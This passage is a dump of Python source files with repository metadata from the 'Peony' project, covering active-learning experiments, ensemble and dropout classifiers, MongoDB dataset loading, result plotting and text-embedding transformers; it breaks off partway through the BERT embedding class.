"is_vendor": false,
"language": "Python",
"length_bytes": 3152,
"license_type": "no_license",
"max_line_length": 106,
"num_lines": 106,
"path": "/Peony_project/Peony_box/test_run.py",
"repo_name": "sahanmar/Peony",
"src_encoding": "UTF-8",
"text": "import numpy as np\nimport time\n\nfrom PeonyPackage.PeonyDb import MongoDb\nfrom Peony_visualization.src.peony_visualization import calculate_binary_metrics\nfrom Peony_box.src.peony_box_model import PeonyBoxModel\nfrom Peony_box.src.peony_adjusted_models.random_trees_model import PeonyRandomForest\n\nfrom Peony_box.src.transformators.HuffPost_transformator import (\n # RoBERTaWordEmbeddings as transformator,\n FastTextWordEmbeddings as transformator,\n)\n\n# from Peony_database.src.datasets.Tweets_emotions_dataset import (\n# COLLECTION_NAME,\n# COLLECTION_ID,\n# )\n\nfrom Peony_database.src.datasets.HuffPost_news_dataset import (\n COLLECTION_NAME,\n COLLECTION_ID,\n)\n\nfrom Peony_box.src.acquisition_functions.functions import (\n entropy_sampling,\n batch_bald,\n hac_sampling,\n power_bald,\n)\nfrom scipy.sparse import vstack\nfrom sklearn.utils import shuffle\n\nfrom sklearn.model_selection import KFold\nfrom sklearn.model_selection import cross_val_score\nfrom Peony_box.src.utils import k_fold_corss_validation, auc_metrics\nfrom sklearn.metrics import accuracy_score\n\n\ndef main():\n api = MongoDb()\n laebl_1 = api.get_record(\n collection_name=COLLECTION_NAME,\n collection_id=COLLECTION_ID,\n label=\"SPORTS\",\n limit=100,\n )\n\n laebl_2 = api.get_record(\n collection_name=COLLECTION_NAME,\n collection_id=COLLECTION_ID,\n label=\"COMEDY\",\n limit=100,\n )\n\n # laebl_1 = api.get_record(\n # collection_name=COLLECTION_NAME,\n # collection_id=COLLECTION_ID,\n # label=0,\n # limit=10,\n # )\n # laebl_2 = api.get_record(\n # collection_name=COLLECTION_NAME,\n # collection_id=COLLECTION_ID,\n # label=4,\n # limit=10,\n # )\n\n instances = laebl_1 + laebl_2\n labels = [sample[\"record\"][\"label\"] for sample in laebl_1 + laebl_2]\n\n instances, labels = shuffle(instances, labels, random_state=0)\n\n Transformator = transformator()\n Transformator.fit(instances, labels)\n # Transformator.fit(labels)\n\n peony_model = PeonyBoxModel(\n Transformator,\n active_learning_step=10,\n acquisition_function=power_bald, # entropy_sampling, batch_bald,\n )\n peony_model.bayesian_dropout_nn.fit(instances[:50], labels[:50])\n # peony_model.bayesian_denfi_nn.reset()\n peony_model.bayesian_dropout_nn.epsilon_greedy_coef = 1\n indexes = peony_model.bayesian_dropout_nn.get_learning_samples(instances[50:])\n\n add_training = [instances[index] for index in indexes.tolist()]\n add_labels = [labels[index] for index in indexes.tolist()]\n\n peony_model.bayesian_dropout_nn.add_new_learning_samples(add_training, add_labels)\n peony_model.bayesian_dropout_nn.fit(instances, labels)\n\n start_time = time.time()\n k_fold = k_fold_corss_validation(peony_model.bayesian_dropout_nn, Transformator, instances, labels, 2)\n print(f\"elapsed time is {time.time() - start_time}\")\n\n print(auc_metrics(k_fold))\n\n scores = [accuracy_score(eval[\"true\"], eval[\"predicted\"], normalize=True) for eval in k_fold]\n\n print(scores)\n print(\"test\")\n\n\nif __name__ == \"__main__\":\n main()\n"
},
{
"alpha_fraction": 0.6232876777648926,
"alphanum_fraction": 0.6275684833526611,
"avg_line_length": 32.371429443359375,
"blob_id": "ff1bbade9678e19425b2bd96b2f653b3c98cca0f",
"content_id": "ccbf677d23fbaa878854be4d59b25ded900bf3f6",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1168,
"license_type": "no_license",
"max_line_length": 79,
"num_lines": 35,
"path": "/Peony_project/Peony_box/src/peony_adjusted_models/svm_model.py",
"repo_name": "sahanmar/Peony",
"src_encoding": "UTF-8",
"text": "import numpy as np\n\nfrom sklearn.svm import SVC\nfrom sklearn.base import clone\nfrom typing import List\n\nNUM_ENSEMBLES = 10\n\n\nclass PeonySVM:\n def __init__(self, rand_sample_ratio: float):\n self.ensembles = [SVC(kernel=\"linear\") for i in range(NUM_ENSEMBLES)]\n self.num_ensembles = NUM_ENSEMBLES\n self.num_of_samples: int = 0\n self.rand_sample_ratio = rand_sample_ratio\n\n def fit(self, instances: np.ndarray, labels: np.ndarray):\n self.num_of_samples = int(instances.shape[0] * self.rand_sample_ratio)\n for index in range(self.num_ensembles):\n indices = np.random.choice(\n instances.shape[0], self.num_of_samples, replace=False\n )\n self.ensembles[index].fit(instances[indices, :], labels[indices])\n\n def predict(self, instances: np.ndarray) -> List[np.ndarray]:\n predicted = [\n self.ensembles[index].predict(instances)\n for index in range(self.num_ensembles)\n ]\n return predicted\n\n def reset(self) -> None:\n self.ensembles = [\n clone(self.ensembles[index]) for index in range(self.num_ensembles)\n ]\n"
},
{
"alpha_fraction": 0.6647610068321228,
"alphanum_fraction": 0.6655550003051758,
"avg_line_length": 31.458763122558594,
"blob_id": "fe8b374798da5d7ac38fda1019ad16d9ed69570c",
"content_id": "d24b9cd709699699f874c613aacb616f543660d6",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 6297,
"license_type": "no_license",
"max_line_length": 100,
"num_lines": 194,
"path": "/Peony_project/Peony_database/src/datasets/fill_in_the_database.py",
"repo_name": "sahanmar/Peony",
"src_encoding": "UTF-8",
"text": "import argparse\n\nfrom pathlib import Path\nfrom PeonyPackage.PeonyDb import MongoDb\n\n# Imports for datasets upload\nfrom Peony_database.src.datasets.HuffPost_news_dataset import (\n COLLECTION_NAME as HuffPost_collection_name,\n transorm_data as HuffPost_transformer,\n load_data as HuffPost_loader,\n)\nfrom Peony_database.src.datasets.Newsgroups_dataset import (\n COLLECTION_NAME as NewsGroups_collection_name,\n transorm_data as NewsGroups_transformer,\n load_data as NewsGroups_loader,\n)\nfrom Peony_database.src.datasets.Tweets_emotions_dataset import (\n COLLECTION_NAME as Tweets_collection_name,\n transorm_data as Tweets_transformer,\n load_data as Tweets_loader,\n)\nfrom Peony_database.src.datasets.Comments_dataset import (\n COLLECTION_NAME as Comments_collection_name,\n transorm_data as Comments_transformer,\n load_data as Comments_loader,\n)\nfrom Peony_database.src.datasets.Emotions_dataset import (\n COLLECTION_NAME as Emotions_collection_name,\n transorm_data as Emotions_transformer,\n load_data as Emotions_loader,\n)\n\nfrom Peony_database.src.datasets.fake_news import (\n COLLECTION_NAME as fake_news_collection_name,\n transorm_data as fake_news_transformer,\n load_data as fake_news_loader,\n)\n\nfrom Peony_database.src.datasets.fake_news_detection import (\n COLLECTION_NAME as fake_news_detection_collection_name,\n transorm_data as fake_news_detection_transformer,\n load_data as fake_news_detection_loader,\n)\n\nfrom Peony_database.src.datasets.liar_paragraph import (\n COLLECTION_NAME as liar_paragraph_collection_name,\n transorm_data as liar_paragraph_transformer,\n load_data as liar_paragraph_loader,\n)\n\nfrom Peony_database.src.datasets.liar_full_text import (\n COLLECTION_NAME as liar_full_text_collection_name,\n transorm_data as liar_full_text_transformer,\n load_data as liar_full_text_loader,\n)\n\nfrom Peony_database.src.datasets.gibberish import (\n COLLECTION_NAME as gibberish_collection_name,\n transorm_data as gibberish_transformer,\n load_data as gibberish_loader,\n)\n\nfrom Peony_database.src.datasets.amazon_reviews import (\n COLLECTION_NAME as amazon_reviews_collection_name,\n transorm_data as amazon_reviews_transformer,\n load_data as amazon_reviews_loader,\n)\n\nfrom Peony_database.src.datasets.emotion_tweets import (\n COLLECTION_NAME as emotion_tweets_collection_name,\n transorm_data as emotion_tweets_transformer,\n load_data as emotion_tweets_loader,\n)\n\n# args for different datasets\ndef input_args() -> argparse.ArgumentParser:\n parser = argparse.ArgumentParser()\n parser.add_argument(\"--huffpost\", help=\"Path to HuffPost dataset\")\n parser.add_argument(\"--newsgroups\", help=\"Path to 4 newsgroups dataset\")\n parser.add_argument(\"--tweets\", help=\"Path to 1600k tweets (emotional semantics)\")\n parser.add_argument(\"--comments\", help=\"Path to comments dataset\")\n parser.add_argument(\"--emotions\", help=\"Path to emotional texts dataset\")\n parser.add_argument(\"--fake_news\", help=\"Path to fake news dataset\")\n parser.add_argument(\"--fake_news_detection\", help=\"Path to fake news detection dataset\")\n parser.add_argument(\"--liar_paragraph\", help=\"Path to liar (fake news) paragraph based dataset\")\n parser.add_argument(\"--liar_full_text\", help=\"Path to liar (fake news) paragraph based dataset\")\n parser.add_argument(\"--gibberish\", help=\"Path to gibberish dataset\")\n parser.add_argument(\"--amazon_reviews\", help=\"Path to amazon_reviews dataset\")\n parser.add_argument(\"--emotion_tweets\", help=\"Path to 
emotion_tweets dataset\")\n return parser\n\n\n# upload to mongo\ndef main():\n args = input_args().parse_args()\n\n api = MongoDb()\n\n if args.huffpost:\n api.load_data_to_database(\n HuffPost_collection_name,\n Path(args.huffpost),\n HuffPost_loader,\n HuffPost_transformer,\n )\n\n if args.newsgroups:\n api.load_data_to_database(\n NewsGroups_collection_name,\n Path(args.newsgroups),\n NewsGroups_loader,\n NewsGroups_transformer,\n )\n\n if args.tweets:\n api.load_data_to_database(\n Tweets_collection_name, Path(args.tweets), Tweets_loader, Tweets_transformer\n )\n\n if args.comments:\n api.load_data_to_database(\n Comments_collection_name,\n Path(args.comments),\n Comments_loader,\n Comments_transformer,\n )\n\n if args.emotions:\n api.load_data_to_database(\n Emotions_collection_name,\n Path(args.emotions),\n Emotions_loader,\n Emotions_transformer,\n )\n\n if args.fake_news:\n api.load_data_to_database(\n fake_news_collection_name,\n Path(args.fake_news),\n fake_news_loader,\n fake_news_transformer,\n )\n\n if args.fake_news_detection:\n api.load_data_to_database(\n fake_news_detection_collection_name,\n Path(args.fake_news_detection),\n fake_news_detection_loader,\n fake_news_detection_transformer,\n )\n\n if args.liar_paragraph:\n api.load_data_to_database(\n liar_paragraph_collection_name,\n Path(args.liar_paragraph),\n liar_paragraph_loader,\n liar_paragraph_transformer,\n )\n\n if args.liar_full_text:\n api.load_data_to_database(\n liar_full_text_collection_name,\n Path(args.liar_full_text),\n liar_full_text_loader,\n liar_full_text_transformer,\n )\n\n if args.gibberish:\n api.load_data_to_database(\n gibberish_collection_name,\n Path(args.gibberish),\n gibberish_loader,\n gibberish_transformer,\n )\n\n if args.amazon_reviews:\n api.load_data_to_database(\n amazon_reviews_collection_name,\n Path(args.amazon_reviews),\n amazon_reviews_loader,\n amazon_reviews_transformer,\n )\n\n if args.emotion_tweets:\n api.load_data_to_database(\n emotion_tweets_collection_name,\n Path(args.emotion_tweets),\n emotion_tweets_loader,\n emotion_tweets_transformer,\n )\n\n\nif __name__ == \"__main__\":\n main()\n"
},
{
"alpha_fraction": 0.5787553787231445,
"alphanum_fraction": 0.5881974101066589,
"avg_line_length": 33.51852035522461,
"blob_id": "c863367ce85dd5fdfbdc5198d410c289d5ac8904",
"content_id": "8605f2c0158acd1a7e78a15e0b0a01cdb2d04c55",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 4660,
"license_type": "no_license",
"max_line_length": 116,
"num_lines": 135,
"path": "/Peony_project/Peony_box/src/peony_adjusted_models/dropout_nn.py",
"repo_name": "sahanmar/Peony",
"src_encoding": "UTF-8",
"text": "import numpy as np\nimport torch\nimport torch.nn as nn\n\nfrom Peony_box.src.peony_adjusted_models.neural_nets_architecture import (\n NeuralNet,\n NeuralNetLSTM,\n)\n\nfrom torch.optim import Optimizer\nfrom torch.utils.data import DataLoader\nfrom typing import Optional, Tuple, List\n\nNUM_SAMPLES = 10\nEPOCHS_PER_SAMPLE = 50\nEPOCHS = 3000\nHOT_START_EPOCHS = 100\n# Device configuration\nDEVICE = torch.device(\"cuda\" if torch.cuda.is_available() else \"cpu\")\nLEARNING_RATE = 0.001\nWEIGHTS_VARIANCE = 0.3\nDEVICE = torch.device(\"cuda\" if torch.cuda.is_available() else \"cpu\")\n\nneural_network = NeuralNet\n\n# NUM_SAMPLES = 10\n# EPOCHS_PER_SAMPLE = 1\n# EPOCHS = 180\n# HOT_START_EPOCHS = 50\n# # Device configuration\n# DEVICE = torch.device(\"cuda\" if torch.cuda.is_available() else \"cpu\")\n# LEARNING_RATE = 0.001\n# WEIGHTS_VARIANCE = 0.10\n# neural_network = NeuralNetLSTM\n\n\nclass PeonyDropoutFeedForwardNN:\n def __init__(self, hidden_size: int, num_classes: int, cold_start=False, dropout_in_eval=True):\n\n self.num_samples = NUM_SAMPLES\n self.epochs_per_sample = EPOCHS_PER_SAMPLE\n self.starting_epoch = 0\n self.hot_start_epochs = HOT_START_EPOCHS\n\n self.model: Optional[List[nn.Module]] = None\n self.criterion: Optional[nn.CrossEntropyLoss] = None\n self.optimizer: Optional[torch.optim.Adam] = None\n\n self.hidden_size = hidden_size\n self.num_classes = num_classes\n self.num_epochs = EPOCHS\n self.initialized = False\n self.cold_start = cold_start\n self.variance = WEIGHTS_VARIANCE\n self.dropout_in_eval = dropout_in_eval\n\n def fit(self, data: DataLoader, features_size: int) -> Optional[List[str]]:\n\n loss_list: List[str] = []\n\n if self.initialized is False:\n self.model = [\n neural_network(features_size, self.hidden_size, self.num_classes, dropout=0.2).to(DEVICE)\n for i in range(self.num_samples)\n ]\n self.criterion = nn.CrossEntropyLoss()\n self.optimizer = torch.optim.Adam(self.model[0].parameters(), lr=LEARNING_RATE)\n self.initialized = True\n\n fitted_loss_per_sample: List[float] = []\n for index in range(self.num_samples):\n\n if self.cold_start is False:\n with torch.no_grad():\n for param in self.model[index].parameters():\n param.add_(torch.randn(param.size()).to(DEVICE) * self.variance)\n\n if index != 0:\n self.model[index].load_state_dict(self.model[0].state_dict())\n self.starting_epoch = self.num_epochs\n self.num_epochs += self.epochs_per_sample\n\n for epoch in range(self.starting_epoch, self.num_epochs):\n\n for instances, labels in data:\n\n # Forward pass\n self.optimizer.zero_grad()\n\n outputs = self.model[0].train()(instances)\n\n loss = self.criterion(outputs, labels.to(DEVICE))\n # Backward and optimize\n loss.backward()\n self.optimizer.step()\n\n if epoch == 0:\n initial_loss_per_sample = loss.cpu().detach().numpy()\n\n fitted_loss_per_sample.append(loss.cpu().detach().numpy())\n loss_list.append(f\"starting loss is {initial_loss_per_sample}\")\n loss_list.append(f\"fitted loss (samples mean) is {np.mean(fitted_loss_per_sample)}\")\n\n if self.initialized and self.cold_start is False:\n self.starting_epoch = 0\n self.num_epochs = self.hot_start_epochs\n else:\n self.starting_epoch = 0\n self.num_epochs = EPOCHS\n\n return loss_list\n\n def predict(self, data: DataLoader) -> np.ndarray:\n predicted_list = []\n for index in range(self.num_samples):\n if not self.dropout_in_eval:\n self.model[index].eval()\n with torch.no_grad():\n predicted_list.append(\n np.concatenate(\n 
[self.model[index].predict(instances).data.cpu().detach().numpy() for instances, _ in data],\n axis=0,\n )\n )\n\n return predicted_list\n\n def reset(self) -> None:\n self.initialized = False\n self.num_epochs = EPOCHS\n self.starting_epoch = 0\n for index in range(self.num_samples):\n for name, module in self.model[index].named_children():\n if name not in [\"sigmoid\", \"softmax\", \"relu\", \"dropout\"]:\n module.reset_parameters()\n"
},
{
"alpha_fraction": 0.5214030742645264,
"alphanum_fraction": 0.524970293045044,
"avg_line_length": 38.11627960205078,
"blob_id": "3587a0d31ca8fab7287e0d538cbacdb3b69ad9e6",
"content_id": "a6a634aa482e2d23eec4f115534cfb8dec6d31fd",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1682,
"license_type": "no_license",
"max_line_length": 88,
"num_lines": 43,
"path": "/Peony_project/Peony_database/src/database_results/results_summary.py",
"repo_name": "sahanmar/Peony",
"src_encoding": "UTF-8",
"text": "from PeonyPackage.PeonyDb import MongoDb\nfrom typing import Dict\n\n\nclass PeonyDbResults:\n def __init__(self):\n self.api = MongoDb()\n self.data = self.api.get_model_results(filter_dict={})\n\n def structurize_data(self) -> Dict[str, Dict[\"str\", dict]]:\n structurized_data: Dict[str, Dict[\"str\", dict]] = {}\n for record in self.data:\n\n model = record[\"model\"]\n category_1 = record[\"category_1\"]\n category_2 = record[\"category_2\"]\n dataset = f\"{category_1} / {category_2}\"\n acquisition_function = record[\"acquisition_function\"]\n\n if model not in structurized_data:\n structurized_data[model] = {dataset: {acquisition_function: record}}\n else:\n if dataset not in structurized_data[model]:\n structurized_data[model][dataset] = {acquisition_function: record}\n else:\n if acquisition_function not in structurized_data[model][dataset]:\n structurized_data[model][dataset][acquisition_function] = record\n else:\n structurized_data[model][dataset][acquisition_function][\n \"results\"\n ] = (\n structurized_data[model][dataset][acquisition_function][\n \"results\"\n ]\n + record[\"results\"]\n )\n return structurized_data\n\n\nif __name__ == \"__main__\":\n results = PeonyDbResults()\n structurized_results = results.structurize_data()\n print(\"finished\")\n"
},
{
"alpha_fraction": 0.4909553825855255,
"alphanum_fraction": 0.5185582041740417,
"avg_line_length": 27.0563907623291,
"blob_id": "2e96923603cd36ac2ce4ad009c15b0ba62e94fd8",
"content_id": "f2a9bc94e34077252ab51f3f44014be824b16dff",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 7463,
"license_type": "no_license",
"max_line_length": 109,
"num_lines": 266,
"path": "/Peony_project/Peony_visualization/src/batch_active_learning_article/plots_for_article.py",
"repo_name": "sahanmar/Peony",
"src_encoding": "UTF-8",
"text": "import matplotlib.pyplot as plt\nimport matplotlib\nimport numpy as np\nimport json\nimport re\nimport pandas as pd\n\nfrom typing import List, Any, Dict\nfrom Peony_visualization.src.batch_active_learning_article.result_ids import DATA\nfrom matplotlib.ticker import FormatStrFormatter\n\n\ndef visualize_auc_evolutions(\n ax,\n markevery,\n auc_seq_passive_1,\n auc_seq_active_1,\n auc_seq_active_2,\n model_1,\n model_2,\n batch,\n title,\n index,\n):\n\n auc_1_passive_mean = auc_seq_passive_1[\"results_mean\"].values.flatten().tolist()[0]\n auc_1_passive_std = auc_seq_passive_1[\"results_std\"].values.flatten().tolist()[0]\n\n auc_1_active_mean = auc_seq_active_1[\"results_mean\"].values.flatten().tolist()[0]\n auc_1_active_std = auc_seq_active_1[\"results_std\"].values.flatten().tolist()[0]\n\n auc_2_active_mean = auc_seq_active_2[\"results_mean\"].values.flatten().tolist()[0]\n auc_2_active_std = auc_seq_active_2[\"results_std\"].values.flatten().tolist()[0]\n\n ax.yaxis.set_major_formatter(FormatStrFormatter(\"%.2f\"))\n ax.grid(alpha=0.2)\n ax.plot(\n [i for i in range(batch, 1000 + batch, batch)],\n auc_1_passive_mean,\n linestyle=\"--\",\n marker=\"+\",\n markevery=markevery,\n color=\"b\",\n lw=1,\n label=f\"Random Selection {model_1} mean\",\n alpha=0.4,\n )\n ax.plot(\n [i for i in range(batch, 1000 + batch, batch)],\n auc_1_passive_mean + auc_1_passive_std,\n linestyle=\"-\",\n color=\"b\",\n alpha=0.1,\n )\n ax.plot(\n [i for i in range(batch, 1000 + batch, batch)],\n auc_1_passive_mean - auc_1_passive_std,\n linestyle=\"-\",\n color=\"b\",\n alpha=0.1,\n )\n\n ax.plot(\n [i for i in range(batch, 1000 + batch, batch)],\n auc_1_active_mean,\n linestyle=\"-\",\n marker=\"+\",\n markevery=markevery,\n color=\"b\",\n lw=1,\n label=f\"Active Learning {model_1} mean\",\n )\n ax.plot(\n [i for i in range(batch, 1000 + batch, batch)],\n auc_1_active_mean + auc_1_active_std,\n linestyle=\"-\",\n color=\"b\",\n alpha=0.1,\n )\n ax.plot(\n [i for i in range(batch, 1000 + batch, batch)],\n auc_1_active_mean - auc_1_active_std,\n linestyle=\"-\",\n color=\"b\",\n alpha=0.1,\n )\n\n ax.plot(\n [i for i in range(batch, 1000 + batch, batch)],\n auc_2_active_mean,\n linestyle=\"-\",\n marker=\"*\",\n markevery=markevery,\n color=\"g\",\n lw=1,\n label=f\"Active Learning {model_2} mean\",\n )\n ax.plot(\n [i for i in range(batch, 1000 + batch, batch)],\n auc_2_active_mean + auc_2_active_std,\n linestyle=\"-\",\n color=\"g\",\n alpha=0.1,\n )\n ax.plot(\n [i for i in range(batch, 1000 + batch, batch)],\n auc_2_active_mean - auc_2_active_std,\n linestyle=\"-\",\n color=\"g\",\n alpha=0.1,\n )\n\n ax.fill_between(\n [i for i in range(batch, 1000 + batch, batch)],\n (auc_1_passive_mean + auc_1_passive_std),\n (auc_1_passive_mean - auc_1_passive_std),\n alpha=0.05,\n color=\"b\",\n )\n\n ax.fill_between(\n [i for i in range(batch, 1000 + batch, batch)],\n (auc_1_active_mean + auc_1_active_std),\n (auc_1_active_mean - auc_1_active_std),\n alpha=0.05,\n color=\"b\",\n )\n\n ax.fill_between(\n [i for i in range(batch, 1000 + batch, batch)],\n (auc_2_active_mean + auc_2_active_std),\n (auc_2_active_mean - auc_2_active_std),\n alpha=0.05,\n color=\"g\",\n )\n\n ax.set_xlabel(\"Requests\", fontsize=13.5)\n if index == 0:\n ax.set_ylabel(\"AUC\", fontsize=13.5)\n ax.set_title(\n title,\n fontsize=16,\n )\n ax.legend(loc=\"lower right\", fontsize=10)\n\n return ax\n\n\ndef get_collection_results() -> Dict[str, List[List[float]]]:\n collection_results = {}\n with 
open(\"Peony_visualization/src/batch_active_learning_article/collection.json\", \"r\") as f:\n for l in f.readlines():\n data = json.loads(l)\n collection_results[data[\"_id\"][\"$oid\"]] = data[\"results\"]\n return collection_results\n\n\ndef merge_resuls_and_metadata(\n resutls: Dict[str, List[List[float]]], metadata: List[List[str]]\n) -> pd.DataFrame:\n list_2_df: List[Any] = []\n for row in metadata:\n id_res = np.array(resutls[row[0]]).squeeze(2)\n\n batch = re.search(r\"(100|50|20|10)\", row[2])\n batch_span = batch.span() # type: ignore\n batch_int = int(batch.group(0)) # type: ignore\n\n warm_start = re.search(r\"warm_start\", row[2])\n if warm_start:\n alg = row[2][: batch_span[0] - 1] + \"_warm_start_\" + row[3]\n else:\n alg = row[2][: batch_span[0] - 1] + \"_\" + row[3]\n mean = np.mean(id_res, axis=0)\n std = np.std(id_res, axis=0)\n list_2_df.append(row[0:2] + [alg, batch_int, id_res, mean, std])\n header = [\"id\", \"dataset\", \"algorithm\", \"batch\", \"results\", \"results_mean\", \"results_std\"]\n df = pd.DataFrame(list_2_df)\n df.columns = header\n return df\n\n\ndef main():\n\n collection_results = get_collection_results()\n df = merge_resuls_and_metadata(collection_results, DATA)\n df = df[\n (df[\"algorithm\"] != \"nn_warm_start_hac_bald\")\n & (df[\"algorithm\"] != \"nn_warm_start_bald\")\n & (df[\"algorithm\"] != \"denfi_hac_bald\")\n & (df[\"algorithm\"] != \"denfi_bald\")\n ]\n\n algorithms = [\n (\n \"mc_dropout_entropy\",\n \"mc_dropout_random\",\n \"nn_min_margin\",\n 10,\n \"Fake news detection\",\n \"MC Dropout\\nHAC Entropy\",\n \"HAC\\nMin-margin\",\n \"Fake News Detection\",\n ),\n (\n \"denfi_entropy\",\n \"denfi_random\",\n \"nn_min_margin\",\n 20,\n \"Amazon Review 3, 5\",\n \"DEnFi\\nEntropy\",\n \"HAC\\nMin-margin\",\n \"Amazon Reviews 3, 5\",\n ),\n (\n \"nn_warm_start_entropy\",\n \"nn_warm_start_random\",\n \"nn_min_margin\",\n 50,\n \"Gibberish\",\n \"NN Entropy\\nWarm-start\",\n \"HAC\\nMin-margin\",\n \"Gibberish\",\n ),\n (\n \"nn_warm_start_entropy\",\n \"nn_warm_start_random\",\n \"nn_min_margin\",\n 100,\n \"Tweet_emotion_detection\",\n \"NN Entropy\\nWarm-start\",\n \"HAC\\nMin-margin\",\n \"Twitter Sentiment\",\n ),\n ]\n\n for index, (q_a_1, q_r_1, q_a_2, batch, q_data, alg_legend_1, alg_legend_2, title_category) in enumerate(\n algorithms\n ):\n\n al_1 = df[(df[\"algorithm\"] == q_a_1) & (df[\"batch\"] == batch) & (df[\"dataset\"] == q_data)]\n al_2 = df[(df[\"algorithm\"] == q_a_2) & (df[\"batch\"] == batch) & (df[\"dataset\"] == q_data)]\n\n rs_1 = df[(df[\"algorithm\"] == q_r_1) & (df[\"batch\"] == batch) & (df[\"dataset\"] == q_data)]\n\n ax = plt.subplot(1, 4, index + 1)\n\n visualize_auc_evolutions(\n ax,\n batch,\n rs_1,\n al_1,\n al_2,\n alg_legend_1,\n alg_legend_2,\n batch,\n f\"{title_category}, batch {batch}\",\n index,\n )\n\n plt.subplots_adjust(left=None, bottom=None, right=None, top=None, wspace=0.2, hspace=0.3)\n plt.show()\n\n\nif __name__ == \"__main__\":\n main()\n"
},
{
"alpha_fraction": 0.6062206625938416,
"alphanum_fraction": 0.6167840361595154,
"avg_line_length": 36.86666488647461,
"blob_id": "22131aeef7a065678a8979af9aa8502a7fa966b4",
"content_id": "b038a3898d575da4ead142214e849cc560b2e20e",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 10226,
"license_type": "no_license",
"max_line_length": 123,
"num_lines": 270,
"path": "/Peony_project/Peony_box/src/transformators/HuffPost_transformator.py",
"repo_name": "sahanmar/Peony",
"src_encoding": "UTF-8",
"text": "from telnetlib import IP\nimport numpy as np\nimport requests\nimport torch\n\nfrom PeonyPackage.PeonyDb import MongoDb\nfrom Peony_box.src.transformators.generalized_transformator import Transformator\nfrom typing import List, Dict, Any, Union, Optional, Tuple, Callable\nfrom Peony_box.src.transformators.common import (\n create_hash,\n lemmatizer,\n stop_words_filter,\n tokenizer,\n)\nfrom fairseq.models.roberta import RobertaModel\nfrom tqdm import tqdm\nfrom functools import lru_cache\n\nfrom nltk.tokenize import sent_tokenize\n\nfrom sklearn.feature_extraction.text import CountVectorizer\nfrom sklearn.feature_extraction.text import TfidfTransformer\n\nfrom bert_serving.client import BertClient\n\nCOLEECTION_NAME = \"Fasttext_pretrained_embeddings\"\nDEVICE = torch.device(\"cuda\" if torch.cuda.is_available() else \"cpu\")\n\nclass FastTextWordEmbeddings(Transformator):\n def __init__(self):\n super().__init__(embedding_dim=300)\n self.transformer = {}\n self.fitted: bool = False\n self.dict_length: int = 0\n self.api = MongoDb()\n\n def fit(self, instances: List[Dict[str, Any]], labels: List[str]) -> None:\n if self.fitted is False:\n print(\"transforming data...\")\n transformed_data = [_transform_text(sample) for sample in tqdm(instances)]\n tokenized_text = [\n token for text in transformed_data for token in stop_words_filter(tokenizer(text))\n ]\n distinct_tokens = set(tokenized_text)\n print(\"creating (words -> embeddings) hash map...\")\n for token in tqdm(distinct_tokens):\n embedding = self.get_embedding_from_database(token)\n if embedding is not None:\n self.transformer[token] = embedding\n print(\"creating labels encoding hash map...\")\n self.encoding_mapper = {value: index for index, value in enumerate(set(labels))}\n self.reverse_mapper = {index: value for index, value in enumerate(set(labels))}\n self.fitted = True\n self.dict_length = len(self.transformer.keys())\n\n def get_embedding_from_database(self, token: str) -> torch.Tensor:\n embedding = self.api.get_record(\n collection_name=\"Fasttext_pretrained_embeddings\",\n collection_id=11,\n hash=create_hash([token]),\n )[0]\n if embedding is None:\n return torch.tensor([0.0 for i in range(300)])\n else:\n return torch.tensor(embedding[\"record\"][\"value\"])\n\n def transform_instances(self, data: List[Dict[str, Any]]) -> List[List[torch.Tensor]]:\n transformed_data = [_transform_text(sample) for sample in tqdm(data)]\n\n with torch.no_grad():\n transformed_instances = [\n [\n _sentence_embed(\n [\n self.transformer[token]\n for token in stop_words_filter(tokenizer(sentence))\n if token in self.transformer\n ]\n + [torch.zeros((300))]\n )\n for sentence in sent_tokenize(str(text))\n ]\n for text in transformed_data\n ]\n return [embed if embed else [torch.zeros((300))] for embed in transformed_instances]\n\n def transform_labels(self, data: List[str]) -> List[int]:\n return [self.transform_label(sample) for sample in tqdm(data)]\n\n def reset(self) -> None:\n self.transformer = {}\n self.fitted = False\n self.dict_length = 0\n\n\nclass LaserWordEmbeddings(Transformator):\n\n \"\"\"\n Before you start use this transformer visit this page\n https://github.com/facebookresearch/LASER/tree/master/docker\n and run laser in docker. 
Use port 59012\n\n docker run -p 59012:80 -it laser python app.py\n \"\"\"\n\n def __init__(self):\n super().__init__(embedding_dim=1024)\n\n self.url = \"http://127.0.0.1:59012/vectorize\"\n self.fitted: bool = False\n\n def transform(self, text: str) -> List[torch.Tensor]:\n return requests.get(url=self.url, params={\"q\": text, \"lang\": \"en\"}).json()[\"embedding\"]\n\n def fit(self, labels: List[str]) -> None:\n if self.fitted is False:\n print(\"laser encoder is encoding on-prem...\")\n print(\"creating labels encoding hash map...\")\n self.encoding_mapper = {value: index for index, value in enumerate(set(labels))}\n self.reverse_mapper = {index: value for index, value in enumerate(set(labels))}\n self.fitted = True\n\n def transform_instances(self, data: List[Dict[str, Any]]) -> List[List[torch.Tensor]]:\n transformed_data = [_transform_text(sample) for sample in data]\n\n with torch.no_grad():\n transformed_instances = [\n [torch.tensor(tensor) for tensor in self.transform(text)] for text in tqdm(transformed_data)\n ]\n return transformed_instances\n\n def transform_labels(self, data: List[str]) -> List[int]:\n return [self.transform_label(sample) for sample in tqdm(data)]\n\n def reset(self) -> None:\n self.fitted = False\n\n\n\"\"\"\npip install bert-serving-server # server\npip install bert-serving-client # client, independent of `bert-serving-server`\nwget https://storage.googleapis.com/bert_models/2018_10_18/uncased_L-12_H-768_A-12.zip && unzip uncased_L-12_H-768_A-12.zip\nOnce we have all the files extracted in a folder, it’s time to start the BERT service:\nbert-serving-start -model_dir uncased_L-12_H-768_A-12/ -num_worker=2 -max_seq_len 50\n\"\"\"\n\n\nclass BertWordEmbeddings(Transformator):\n def __init__(self):\n super().__init__(embedding_dim=768)\n\n self.bc_client = BertClient(ip=\"localhost\")\n self.fitted: bool = False\n\n def transform(self, text: str) -> List[torch.Tensor]:\n return self.bc_client.encode(sent_tokenize(text))\n\n def fit(self, labels: List[str]) -> None:\n if self.fitted is False:\n print(\"BERT encoder is encoding on-prem...\")\n print(\"creating labels encoding hash map...\")\n self.encoding_mapper = {value: index for index, value in enumerate(set(labels))}\n 